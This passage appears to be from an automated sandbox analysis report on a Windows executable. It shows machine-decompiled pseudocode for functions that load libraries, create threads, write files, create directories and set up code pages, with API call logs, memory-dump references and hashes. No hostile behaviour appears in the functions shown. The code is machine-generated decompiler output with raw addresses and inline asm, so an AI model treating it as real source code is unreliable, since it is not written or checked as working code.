              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 270f94e161c19e3220ee30a6a26844421de48f8f83bb3d42e9edd1e5e81d3e4e
              • Instruction ID: 8f68ae9235d596a0a5b3d0bc2d3c4bf8e96b411d5162e77b6285f27100ca0a60
              • Opcode Fuzzy Hash: 270f94e161c19e3220ee30a6a26844421de48f8f83bb3d42e9edd1e5e81d3e4e
              • Instruction Fuzzy Hash: 1B119A32504208EFDF209A65C960A6EB7A9EB01320F10C629E86EC5290FB74CD40DF71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99A2C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00D99A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xdd0768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xda5ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x9e43e7e5
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











              0x00d99a31
              0x00d99a35
              0x00d99a3c
              0x00d99a40
              0x00d99a4e
              0x00d99a5e
              0x00d99a64
              0x00d99a68
              0x00d99a91
              0x00d99a93
              0x00d99a97
              0x00d99a9a
              0x00d99a9a
              0x00d99aa0
              0x00d99aa2
              0x00000000
              0x00d99aa3
              0x00d99a6a
              0x00d99a73
              0x00d99a82
              0x00d99a75
              0x00d99a78
              0x00d99a7e
              0x00d99a7e
              0x00d99a86
              0x00000000
              0x00d99a88
              0x00d99a8b
              0x00d99a8d
              0x00000000
              0x00d99a8d
              0x00d99a86
              0x00d99a42
              0x00d99a47
              0x00000000

              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D92E0F,00000000,00000000,?,00D999D3,00D92E0F,00000000,00000000,00000000,?,00D99BD0,00000006,FlsSetValue), ref: 00D99A5E
              • GetLastError.KERNEL32(?,00D999D3,00D92E0F,00000000,00000000,00000000,?,00D99BD0,00000006,FlsSetValue,00DA6058,00DA6060,00000000,00000364,?,00D985E8), ref: 00D99A6A
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D999D3,00D92E0F,00000000,00000000,00000000,?,00D99BD0,00000006,FlsSetValue,00DA6058,00DA6060,00000000), ref: 00D99A78
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 550c4605d85af28a9a5b62b2ad1fc8bb65c0b4d28a30e655ab04552f85e5b612
              • Instruction ID: c68f1270b79f3c2fde1f910802a6cb45a02077b9e9f98cdc76a76fe407ca0cb7
              • Opcode Fuzzy Hash: 550c4605d85af28a9a5b62b2ad1fc8bb65c0b4d28a30e655ab04552f85e5b612
              • Instruction Fuzzy Hash: 3E01F732242322ABCB218B7E9C54A66B798EF467A17140629F946D7240D731D800C6F0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D804F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E00D804F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xdb00e0 > 0) {
					_t18 = 0xdb00e4;
					do {
						_t7 = CreateThread(0, 0x10000, E00D8062F, 0xdb00e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xdb00e0);
							E00D76CC9(E00D8E214(E00D76CCE(0xdb00e0)), 0xdb00e0, 0xdb00e0, 2);
						}
						 *_t18 = _t22;
						 *0x00DB01E4 =  *((intOrPtr*)(0xdb01e4)) + 1;
						_t8 =  *0xdb7368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xdb00e0);
					return _t8;
				}
				return _t5;
			}













              0x00d804fa
              0x00d804fe
              0x00d80502
              0x00d80505
              0x00d80519
              0x00d8051f
              0x00d80523
              0x00d80525
              0x00d8052a
              0x00d80547
              0x00d80547
              0x00d8054c
              0x00d8054e
              0x00d80554
              0x00d8055b
              0x00d80560
              0x00d80560
              0x00d80566
              0x00d80567
              0x00d8056a
              0x00000000
              0x00d8056f
              0x00d80573

              APIs
              • CreateThread.KERNELBASE ref: 00D80519
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00D80560
                • Part of subcall function 00D76CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76CEC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: 1a958c3d655e5916a87b70132e830468e9c15205d8bc6fd58816fe8739a6842f
              • Instruction ID: 6369a77b45499b2c109d6eb659455b5f07526d10f4ce736353b8103eb86470a7
              • Opcode Fuzzy Hash: 1a958c3d655e5916a87b70132e830468e9c15205d8bc6fd58816fe8739a6842f
              • Instruction Fuzzy Hash: 5D01A9B1348305AFD3647F559C41FB77FA8EB85751F10006EF686A62C1DAA1A889CB34
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79C34, Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00D79C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00D76C55(0xdb00e0, _t53 + 0x1e, 0) == 0) {
									E00D76E9B(0xdb00e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}













              0x00d79c34
              0x00d79c35
              0x00d79c3a
              0x00d79c3e
              0x00d79c4b
              0x00d79c55
              0x00d79c55
              0x00d79c5a
              0x00d79c5a
              0x00d79c5f
              0x00d79c65
              0x00000000
              0x00000000
              0x00d79c67
              0x00d79c6b
              0x00d79ccf
              0x00d79cd3
              0x00d79d2d
              0x00d79d30
              0x00000000
              0x00d79cdb
              0x00d79cdd
              0x00d79ced
              0x00d79d28
              0x00000000
              0x00d79d28
              0x00d79cf3
              0x00d79d04
              0x00d79d0a
              0x00d79d13
              0x00d79d18
              0x00d79d18
              0x00000000
              0x00d79cf3
              0x00000000
              0x00000000
              0x00000000
              0x00d79c6d
              0x00d79c6d
              0x00d79c6f
              0x00d79c76
              0x00d79c78
              0x00d79c78
              0x00d79c95
              0x00d79c9a
              0x00d79c9c
              0x00d79c9f
              0x00000000
              0x00000000
              0x00d79ca1
              0x00d79ca9
              0x00000000
              0x00000000
              0x00d79ccb
              0x00d79ccd
              0x00000000
              0x00000000
              0x00000000
              0x00d79ccd
              0x00000000
              0x00d79cad
              0x00d79cbc
              0x00d79cc5
              0x00d79cc9
              0x00000000
              0x00d79cc9
              0x00d79c5a
              0x00000000

              APIs
              • GetStdHandle.KERNEL32(000000F5,?,?,00D7C90A,00000001,?,?,?,00000000,00D84AF4,?,?,?,?,?,00D84599), ref: 00D79C4F
              • WriteFile.KERNEL32(?,00000000,?,00D847A1,00000000,?,?,00000000,00D84AF4,?,?,?,?,?,00D84599,?), ref: 00D79C8F
              • WriteFile.KERNELBASE(?,00000000,?,00D847A1,00000000,?,00000001,?,?,00D7C90A,00000001,?,?,?,00000000,00D84AF4), ref: 00D79CBC
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: b4e2934387741abde8b19e0c53ba80b29c1285508cb4f78baf94ed4734a90dde
              • Instruction ID: 18e20550a18b8766b82c9fdc240d3536d7eb0a0a5a99f98a33fee0bb2bd78321
              • Opcode Fuzzy Hash: b4e2934387741abde8b19e0c53ba80b29c1285508cb4f78baf94ed4734a90dde
              • Instruction Fuzzy Hash: A9313372204309AFDB219E24C829BA6FBE8EB51310F18C119F59993690E734E849CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79EF2, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D79EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00D8D940();
				_t21 = _a4;
				_t8 =  *(E00D7B927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00D79E6B(_t21) != 0 || E00D7B32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00D7A12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









              0x00d79efa
              0x00d79f00
              0x00d79f09
              0x00d79f0f
              0x00d79f23
              0x00d79f2b
              0x00d79f69
              0x00d79f6f
              0x00d79f72
              0x00d79f7e
              0x00d79f80
              0x00d79f74
              0x00d79f74
              0x00d79f77
              0x00000000
              0x00d79f79
              0x00d79f7b
              0x00d79f7b
              0x00d79f77
              0x00000000
              0x00000000
              0x00000000
              0x00d79f16
              0x00d79f19
              0x00d79f21
              0x00d79f56
              0x00d79f5a
              0x00d79f60
              0x00d79f60
              0x00d79f65
              0x00000000
              0x00000000
              0x00000000
              0x00d79f21
              0x00d79f85

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D79F19
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D79F4C
              • GetLastError.KERNEL32(?,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D79F69
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 7588c82562cf8922a08aab24560ee760a0bdff3909cb8918a5abb61721756394
              • Instruction ID: 063b6f3dd8ff6c85f08c2d2c5d6531d17726c6fc17d220084ded4fa6163b98fa
              • Opcode Fuzzy Hash: 7588c82562cf8922a08aab24560ee760a0bdff3909cb8918a5abb61721756394
              • Instruction Fuzzy Hash: 80019E3360831466EB21AA698C16BFEF34CDF06740F088442F94DE6091F764C981CAB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00D7399D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E00D8D870(E00DA11BE, _t153);
				E00D8D940();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00D7134C(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E00D7C5C9(_t83, _t120);
						_push(_t120);
						E00D814DE(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00D82842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E00D7A728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E00D7C67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E00D824D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E00D7910B(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E00D7A6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00D76BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00D76E03(0xdb00e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00D7FBBB(_t148);
									}
								}
								L25:
								E00D816CB(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E00D7C634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00D71EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E00D7C699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00D7134C(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00D7134C(_t156, 0x1d, _t151 + 0x1e);
					E00D76E03(0xdb00e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

















              0x00d7399d
              0x00d7399d
              0x00d739a2
              0x00d739ac
              0x00d739b2
              0x00d739b4
              0x00d739bb
              0x00d739d9
              0x00d739e0
              0x00d73c22
              0x00d73c28
              0x00000000
              0x00d73c28
              0x00d739e8
              0x00d739f9
              0x00d739ff
              0x00000000
              0x00000000
              0x00d73a0b
              0x00d73a0b
              0x00d73a11
              0x00d73a22
              0x00d73a23
              0x00d73a2c
              0x00d73a31
              0x00d73a38
              0x00d73a3d
              0x00d73a4c
              0x00d73a4f
              0x00d73a54
              0x00d73a57
              0x00d73a5a
              0x00d73aaf
              0x00d73aaf
              0x00d73ab5
              0x00d73b11
              0x00d73b1f
              0x00d73b33
              0x00d73b40
              0x00d73b46
              0x00d73b4c
              0x00d73b54
              0x00d73b5a
              0x00d73b66
              0x00d73b72
              0x00d73b75
              0x00d73b78
              0x00d73b7e
              0x00d73b84
              0x00d73b8a
              0x00d73b90
              0x00d73b96
              0x00d73b9c
              0x00d73bb5
              0x00d73b9e
              0x00d73b9e
              0x00d73b9f
              0x00d73ba0
              0x00d73ba1
              0x00d73ba1
              0x00d73bcf
              0x00d73bd1
              0x00d73be0
              0x00d73be2
              0x00d73c0f
              0x00d73be4
              0x00d73bf1
              0x00d73bfd
              0x00d73c02
              0x00d73c04
              0x00d73c08
              0x00d73c08
              0x00d73c04
              0x00d73c11
              0x00d73c17
              0x00d73c1d
              0x00000000
              0x00d73c1f
              0x00d73ab7
              0x00d73abd
              0x00d73ac3
              0x00000000
              0x00000000
              0x00d73aec
              0x00d73af5
              0x00d73af5
              0x00d73b0c
              0x00000000
              0x00d73b0c
              0x00d73a5c
              0x00d73a62
              0x00d73a82
              0x00d73a82
              0x00d73a84
              0x00d73a97
              0x00d73aaa
              0x00d73a86
              0x00d73a86
              0x00d73a86
              0x00000000
              0x00d73a84
              0x00d73a64
              0x00d73a72
              0x00d73a78
              0x00000000
              0x00d73a78
              0x00d73a66
              0x00d73a70
              0x00000000
              0x00000000
              0x00000000
              0x00d73a70
              0x00d73a13
              0x00d73a19
              0x00000000
              0x00d73a1b
              0x00d73a1b
              0x00000000
              0x00d73a1b
              0x00d739bd
              0x00d739c3
              0x00d739cf
              0x00d73c2d
              0x00d73c2d
              0x00d73c2f
              0x00d73c33
              0x00d73c3d
              0x00d73c3d

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID: CMT
              • API String ID: 3519838083-2756464174
              • Opcode ID: 84f5649c71f33733a6d50fda1635b9d8490526870f6a657b4957b4a6114689f4
              • Instruction ID: a6f60c912b519d150738d9e4ae8c7f89d8d6a4f66c787e36c8b3ac0b84fff367
              • Opcode Fuzzy Hash: 84f5649c71f33733a6d50fda1635b9d8490526870f6a657b4957b4a6114689f4
              • Instruction Fuzzy Hash: 56719F75500B44AEDB21DB34CC41AEBB7E8EB14301F48896EE5DF97142E631AA48DF31
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9A51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D9A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0xd9ab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0xd9ab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E00D9B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E00D997C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E00D997C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
